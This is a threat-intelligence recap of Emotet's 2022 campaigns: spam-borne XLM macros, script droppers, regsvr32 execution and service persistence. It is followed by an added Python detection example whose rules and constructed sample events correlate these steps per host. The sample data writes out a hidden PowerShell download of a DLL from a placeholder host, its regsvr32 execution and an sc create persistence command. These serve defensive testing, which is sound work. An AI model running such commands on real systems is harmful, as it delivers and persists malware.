2022-05-31

Recap of Emotet Botnet in 2022

Industries: Education, Government, Healthcare, Manufacturing, Real Estate, Technology, Transportation | Level: Tactical | Source: Trend Micro

Trend Micro's tracking of Emotet malware through the first quarter of 2022 found the threat predominantly affecting victims in Japan, followed by countries in APAC and EMEA. By industry vertical, the organizations most affected were in manufacturing, education, government, healthcare, transportation, real estate, technology, and retail. Emotet is distributed largely through spam campaigns, and recent waves have used Excel 4.0 (XLM) macros in the attached workbook. The macro typically drops a BAT or VBScript file that downloads additional payloads, which are then executed with regsvr32. An alternate infection chain uses LNK files to launch PowerShell commands that execute the payload. Persistence is usually established by creating a new service on the host and/or an autorun registry key. Once installed, the operators' command and control can push modules that update the malware, steal credentials, and propagate through the victim's network.

Anvilogic Scenario:

  • Emotet Behaviors

Anvilogic Use Cases:

  • Malicious Document Execution
  • Executable Create Script Process
  • Powershell DLL/EXE
  • Regsvr32 Execution
  • Suspicious File written to Disk
  • Windows Service Created
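The following is an added example, not Anvilogic's or Trend Micro's code, showing how the infection chain summarized above maps onto the use cases listed: one rule per use case, run over constructed Sysmon-style process-creation and file-write events, then correlated per host so that several use cases firing together on one machine surface the scenario rather than a single noisy alert. Every host name, path, file name and event is invented, and the event schema (host, type, pid, ppid, image, command_line, target) is an assumption rather than any product's format.

```python
"""Added example (not Anvilogic's or Trend Micro's code): detection logic for the
Emotet chain above, run over constructed events. All hosts, paths, file names and
events are invented; the field names are an assumed schema."""
import re
import ntpath
from collections import defaultdict

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
LOLBINS = {"regsvr32.exe", "rundll32.exe", "mshta.exe"}
# Locations an unprivileged user can write to; payload drops there are suspicious.
USER_WRITABLE = re.compile(r"\\(users\\[^\\]+\\appdata|programdata|windows\\temp)\\", re.I)
SCRIPT_EXT = re.compile(r"\.(bat|cmd|vbs|js)\b", re.I)
BINARY_EXT = re.compile(r"\.(dll|ocx|exe)\b", re.I)
DOWNLOAD = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|https?://", re.I)

def base(path):
    return ntpath.basename(path).lower()

# --- Process-creation rules: (event, parent event or None) -> bool ---
def malicious_document_execution(ev, parent):
    """Office application spawning a shell, script host or LOLBin."""
    return parent is not None and base(parent["image"]) in OFFICE \
        and base(ev["image"]) in SCRIPT_HOSTS | LOLBINS

def executable_create_script_process(ev, parent):
    """Script host launched with a script file that lives in a user-writable path."""
    cl = ev["command_line"]
    return base(ev["image"]) in SCRIPT_HOSTS and bool(SCRIPT_EXT.search(cl)) \
        and bool(USER_WRITABLE.search(cl))

def powershell_dll_exe(ev, parent):
    """PowerShell fetching a DLL/EXE over the network."""
    cl = ev["command_line"]
    return base(ev["image"]) == "powershell.exe" and bool(BINARY_EXT.search(cl)) \
        and bool(DOWNLOAD.search(cl))

def regsvr32_execution(ev, parent):
    """regsvr32 registering a DLL/OCX from a user-writable path."""
    return base(ev["image"]) == "regsvr32.exe" and bool(USER_WRITABLE.search(ev["command_line"]))

def windows_service_created(ev, parent):
    """Service creation via sc.exe or New-Service (persistence)."""
    cl = ev["command_line"].lower()
    img = base(ev["image"])
    return (img == "sc.exe" and re.search(r"\bcreate\b", cl) is not None) \
        or (img == "powershell.exe" and "new-service" in cl)

# --- File-write rule: event -> bool ---
def suspicious_file_written(ev):
    """Office app or script host dropping a script/binary into a user-writable path."""
    t = ev["target"]
    return base(ev["image"]) in OFFICE | SCRIPT_HOSTS and bool(USER_WRITABLE.search(t)) \
        and bool(SCRIPT_EXT.search(t) or BINARY_EXT.search(t))

PROCESS_RULES = [malicious_document_execution, executable_create_script_process,
                 powershell_dll_exe, regsvr32_execution, windows_service_created]

def detect(events):
    """One hit per (rule, event): dicts with host, pid, rule."""
    by_pid = {(e["host"], e["pid"]): e for e in events if e["type"] == "process"}
    hits = []
    for ev in events:
        if ev["type"] == "process":
            parent = by_pid.get((ev["host"], ev["ppid"]))
            fired = [r.__name__ for r in PROCESS_RULES if r(ev, parent)]
        else:
            fired = ["suspicious_file_written"] if suspicious_file_written(ev) else []
        hits.extend({"host": ev["host"], "pid": ev["pid"], "rule": r} for r in fired)
    return hits

def rules_by_host(events):
    """Distinct rules fired per host: the scenario view that chains the use cases."""
    seen = defaultdict(set)
    for h in detect(events):
        seen[h["host"]].add(h["rule"])
    return {host: sorted(rules) for host, rules in seen.items()}

def triage(events, min_rules=3):
    """Hosts where at least min_rules distinct use cases fired; one rule alone is
    noisy, several on the same host in sequence look like the Emotet chain."""
    return sorted(h for h, rules in rules_by_host(events).items() if len(rules) >= min_rules)

def proc(host, pid, ppid, image, cl):
    return {"type": "process", "host": host, "pid": pid, "ppid": ppid, "image": image, "command_line": cl}

def fwrite(host, pid, image, target):
    return {"type": "file", "host": host, "pid": pid, "image": image, "target": target}

XL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
TMP = r"C:\Users\alice\AppData\Local\Temp"
EVENTS = [  # constructed sample: WS01 runs the full chain, WS02 is benign activity
    proc("WS01", 4001, 3000, XL, r'EXCEL.EXE "C:\Users\alice\Downloads\invoice.xlsm"'),
    fwrite("WS01", 4001, XL, TMP + r"\dl.bat"),
    proc("WS01", 4002, 4001, r"C:\Windows\System32\cmd.exe", f"cmd.exe /c {TMP}\\dl.bat"),
    proc("WS01", 4003, 4002, PS, "powershell -w hidden (New-Object Net.WebClient)"
         f".DownloadFile('http://example.invalid/a.dll','{TMP}\\a.dll')"),
    fwrite("WS01", 4003, PS, TMP + r"\a.dll"),
    proc("WS01", 4004, 4002, r"C:\Windows\System32\regsvr32.exe", f"regsvr32.exe /s {TMP}\\a.dll"),
    proc("WS01", 4005, 4004, r"C:\Windows\System32\sc.exe", f'sc create WinUpdSvc binPath= "{TMP}\\a.dll" start= auto'),
    proc("WS02", 5001, 3000, XL, r'EXCEL.EXE "C:\Users\bob\Documents\budget.xlsx"'),
    proc("WS02", 5002, 3000, PS, "powershell.exe Get-Process"),
    proc("WS02", 5003, 3000, r"C:\Windows\System32\regsvr32.exe", r"regsvr32.exe /s C:\Windows\System32\msxml3.dll"),
]

if __name__ == "__main__":
    for host, rules in rules_by_host(EVENTS).items():
        print(host, rules)
    print("triage:", triage(EVENTS))
```

On the sample, WS01 fires all six rules and is the only host returned by `triage`, while WS02's Excel launch, interactive PowerShell and system-path regsvr32 fire nothing. The path and parent-process checks are what keep the individual rules from alerting on every legitimate regsvr32 or PowerShell invocation; the per-host correlation is what turns the remaining hits into the scenario.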
